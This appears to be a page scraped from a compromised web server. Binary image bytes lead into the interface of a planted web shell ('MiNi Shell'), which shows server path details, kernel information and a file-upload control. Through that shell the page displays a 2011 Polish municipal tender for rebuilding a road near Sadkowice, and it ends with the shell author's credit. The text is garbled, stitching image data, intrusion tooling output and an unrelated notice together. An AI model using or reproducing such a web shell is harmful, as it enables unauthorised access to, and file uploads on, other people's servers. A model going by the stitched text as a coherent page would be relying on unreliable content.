JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110504/99650-N-2011.html

<p class="kh_header"><b>Sadkowice: PRZETARG NIEOGRANICZONY
NA  PRZEBUDOWĘ DROGI GMINNEJ NR 383504 SADKOWICE-GOGOLIN</b><br>
<b>Numer ogłoszenia: 99650 - 2011; data zamieszczenia: 04.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sadkowice , Sadkowice 129A, 96-206 Sadkowice, woj. łódzkie, tel. 046 8156191, faks 046 8156191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gminasadkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY
NA  PRZEBUDOWĘ DROGI GMINNEJ NR 383504 SADKOWICE-GOGOLIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> III. OPIS PRZEDMIOTU ZAMÓWIENIA

Nomenklatura wg. Wspólnego Słownika Zamówień:
Grupa robót : 	CPV 45200000-9 : 	Roboty budowlane w zakresie wznoszenia 								kompletnych obiektów budowlanych lub ich 								części oraz roboty w zakresie inżynierii lądowej 								i wodnej
Klasa robót : 	CPV 45230000-8 : 	Roboty budowlane w zakresie dróg, lotnisk i kolei
Kategoria robót : 	CPV 45233000-0 : 	Roboty w zakresie wykonywania nawierzchni dróg


Zamówienie obejmuje wykonanie:

1.	Roboty pomiarowe przy liniowych robotach ziemnych - 1,42 km
2.	Roboty ziemne wykonywane koparkami podsiębiernymi o pojemności łyżki 0.25 m3 w gr. kat. III z transportem   urobku na odległości do 5 km samochodami samowyładowczymi - pogłębienie rowów (bez zjazdów) - 2679,00 m3
3.	Mechaniczne karczowanie krzaków i podszyć gęstych powyżej 60% powierzchni - 0,57 ha
4.	Profilowanie i zagęszczanie podłoża wykonywane mechanicznie w gruncie kat. II - IV pod warstwy konstrukcyjne nawierzchni - 6964,50 m2
5.	Warstwa górna podbudowy z kruszyw łamanych 0/31 stabilizowanych mechanicznie grubości 8 cm - 6964,50 m2
6.	Skropienie asfaltem podbudowy - 6540,10 m2
7.	Warstwa wiążąca z betonu asfaltowego AC 11W o grubości 3 cm - 6540,10 m2
8.	Skropienie asfaltem warstwy wiążącej - 6540,10 m2
9.	Warstwa ścieralna z betonu asfaltowego 0/8 o grubości 3 cm - 6398,50 m2
10.	Roboty ziemne wykonywane koparkami podsiębiernymi o pojemności łyżki 0.25 m3 w gr. kat. III z transportem urobku na odległości do 5 km samochodami samowyładowczymi - wykopy pod części przelotowe przepustów zjazdów - 151,00 m3
11.	Przepusty rurowe pod zjazdami - rury z tworzywa sztucznego o średnicy 40 cm - 151,00 m
12.	Przepusty rurowe pod zjazdami - prefabr. ścianki czołowe dla rur o średnicy 40 cm - 42 szt
13.	Zasypanie przepustów pod zjazdami gruntem kat. II z zagęszczaniem mechanicznym zagęszczarkami (grubość warstwy w stanie luźnym 40 cm) -  105,70 m3
14.	Podbudowa zjazdów z kruszyw łamanych 0/31 stabilizowanych mechanicznie grubości 8 cm - 530,00 m2
15.	Nawierzchnia zjazdów z betonu asfaltowego 0/12.8 o grubości 4 cm - 525,00 m3
16.	Mechaniczne uzupełnianie i profilowanie poboczy destruktem bitumicznym przy średniej grubości 15 cm - 2122,50 m2
17.	Zagęszczanie poboczy z destruktu-  2122,50 m2
18.	Pionowe znaki drogowe - słupki z rur stalowych - 2 szt
19.	Pionowe znaki drogowe - znaki ostrzegawcze A-1, A-2  - 2 szt

Zamówienie obejmuje wykonanie kosztorysów powykonawczych.

	Wykonawca robót jest zobowiązany do opracowania projektu organizacji ruchu na czas robót na koszt własny. Wykonawca jest ponadto zobowiązany do wykonania i utrzymania na własny koszt wykonanego oznakowania tymczasowego robót przez cały okres realizacji, a także jego demontażu po robotach i powinien to uwzględnić 	w cenie ofertowej.
	Przed przystąpieniem do robót - w dniu przekazania terenu Wykonawca przedstawi 	Zamawiającemu zatwierdzony projekt organizacji ruchu na czas prowadzenia robót 	(zgodnie z obowiązującymi przepisami)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości:

	         20.000 zł  /słownie: dwadzieścia tysięcy 00/100 złotych/
		
2. Wadium wnosi się przed upływem terminu składania ofert.

3. Wadium może być wniesione w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:
	- w pieniądzu.
-	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy 	-
-	oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
-	w gwarancjach bankowych;
-	w gwarancjach ubezpieczeniowych
-	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 `	ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158  z pózn. zm.

4. W przypadku wnoszenia wadium w formie pieniądza, wpłaty należy dokonać 	przelewem na
 	rachunek bankowy Zamawiającego tj.:
 	Urząd Gminy Sadkowice BSZŁ 16928811251850078120000040

5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.

6. Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ, zostanie wykluczony z postępowania.

7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty
 najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy.

8. Zamawiający zwróci wadium wykonawcy, którego oferta została wybrana, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy.

9. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

10. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 ustawy , nie złożył dokumentów, oświadczeń lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.

13. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a). odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach 
określonych w ofercie;
b). zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca oświadczy, ze posiada uprawnienia do wykonywania określonej działalności lub czynności wg wzoru (Załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca oświadczy o spełnianiu w/w warunków wg wzoru (Załącznik nr. 4 do SIWZ) i przedłoży dokumenty potwierdzające posiadane  doświadczenie zawodowe oraz wykonał w okresie  ostatnich pięciu lat  przed  dniem wszczęcia postępowania  o udzielenie zamówienia , a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie minimum 3 roboty budowlane  odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym  przedmiot zamówienia   wyszczególniony w ślepym kosztorysie  oraz opisie przedmiotu zamówienia. Wykonawca  zobowiązany jest  dołączyć do oferty  referencje wystawione  przez zamawiających potwierdzające, że powyższe roboty  zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca oświadczy o spełnianiu w/w warunku wg wzoru (Załącznik nr. 4 do SIWZ) i przedstawi dokumenty potwierdzające iż dysponuje lub będzie dysponował  sprzętem niezbędnym do wykonania zamówienia tj. (minimalna wymagana liczba jednostek)
1.	spycharka min 55 kW
2.	równiarka min 74 kW - profilowanie
3.	walec wibracyjny
4.	walec statyczny
5.	walec ogumiony
6.	walec stalowy gładki i okołkowany
7.	zagęszczarka wibracyjna spalinowa
8.	zagęszczarki płytowe wibracyjne ręczne
9.	samochód samowyładowczy min 5-10 t
10.	koparka przedsiębierna o pojemności łyżki od 0.25 m3
11.	układarki do układania mieszanek mineralno - afsaltowych typu zagęszczonego o szer. min 4m
12.	rozkładarka do kruszyw o szer. min 4m
13.	skrapiarka do bitumu z pompą min. 250-500 dm3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca oświadczy o spełnianiu w/w warunku wg wzoru (Załącznik nr. 4 do SIWZ) i przedstawi dokumenty potwierdzające iż Wykonawca ma do dyspozycji odpowiednio wykwalifikowaną kadrę pracowników posiadającą  kwalifikacje określone  poniżej min. :
- Kierownik budowy - osoba posiadająca kwalifikacje i doświadczenie w samodzielnym kierowaniu robotami budowlanymi przy realizacji robót drogowych , posiadająca co najmniej 3 lata uprawnienia budowlane o specjalności drogowej bez ograniczeń, do kierowania robotami budowlanymi. Ponadto Wykonawca zobowiązany jest przedłożyć kopie aktualnych  zaświadczeń o przynależności do właściwej Izby Inżynierów Budownictwa oraz kopie uprawnień budowlanych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca przedstawi aktualną opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w kwocie obejmującej co najmniej zakres przewidywanego zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta powinna zawierać również następujące dokumenty lub oświadczenia:

1.1  Formularz Oferty - sporządzony zgodnie z formularzem załączonym do specyfikacji istotnych warunków zamówienia (Załącznik nr. 1) podpisany przez Wykonawcę lub osobę umocowaną przez Wykonawcę.

1.2  Kosztorys ofertowy z cenami jednostkowymi i wartością robót stanowiącą  cenę zamówienia - sporządzony na formularzu kosztorysu ofertowego (Załącznik nr. 2)

1.3  Dowód wniesienia wadium (kopia dokumentu potwierdzająca wniesienie wadium).

1.4. Aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

1.5  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1 p pkt 1.4, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż  6 miesięcy  przed upływem  terminu składania ofert.

1.6  Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa,  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

1.7  Jeżeli załączona kserokopia któregoś z wymaganych dokumentów będzie nieczytelna lub będzie budziła wątpliwości  co do jej prawdziwości Zamawiający może żądać przedłożenia przez Wykonawcę oryginału dokumentu lub jego notarialnie potwierdzonej kopii.
1.8 W przypadku zastrzegania jawności jakichkolwiek dokumentów zaleca się złożenie Oferty w 2 tomach:   
	- tom I - powinien zawierać Formularz Oferty; dodatkowo należy w nim zamieścić 	informacje, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu 	przepisów o zwalczaniu nieuczciwej konkurencji,
	- tom II - powinien zawierać dokumenty, które stanowią tajemnicę 	przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji i 	zastrzeżenie 	Wykonawcy w odniesieniu do tych informacji, że nie mogą być one 	udostępnione innym uczestnikom postępowania.
	Obydwa tomy powinny zawierać łącznie dokumenty określone w niniejszym 	rozdziale.

	Brak zastrzeżenia Wykonawcy w odniesieniu do informacji, o których mowa 	powyżej, że nie mogą być one udostępnione innym uczestnikom postępowania 	lub złożenie Oferty w jednym tomie będzie skutkować przyjęciem przez 	Zamawiającego, że treść Oferty, 	wszelkich oświadczeń i zaświadczeń 	składanych przez Wykonawcy jest jawna i może zostać udostępniona innym 	uczestnikom 	postępowania.

2. Zamawiający ma prawo żądać od Wykonawcy, aby przedstawił w wyznaczonym terminie bardziej szczegółowe informacje dotyczące treści złożonej oferty.

3. Wykonawcy występujący wspólnie.

a).Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.

b). W przypadku, o którym mowa w pkt. 3.1 wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenia zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

c). Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w pkt. 3 lit a.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje zmianę terminu wykonania przedmiotu zamówienia pod warunkiem wystąpienia:

a). siły wyższej w rozumieniu Kodeksu Cywilnego jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia

2. Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminasadkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sadkowice
		96-206 Sadkowice 129A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2011 godzina 10:00, miejsce: Urząd Gminy Sadkowice
		96-206 Sadkowice 129A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 20.06.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com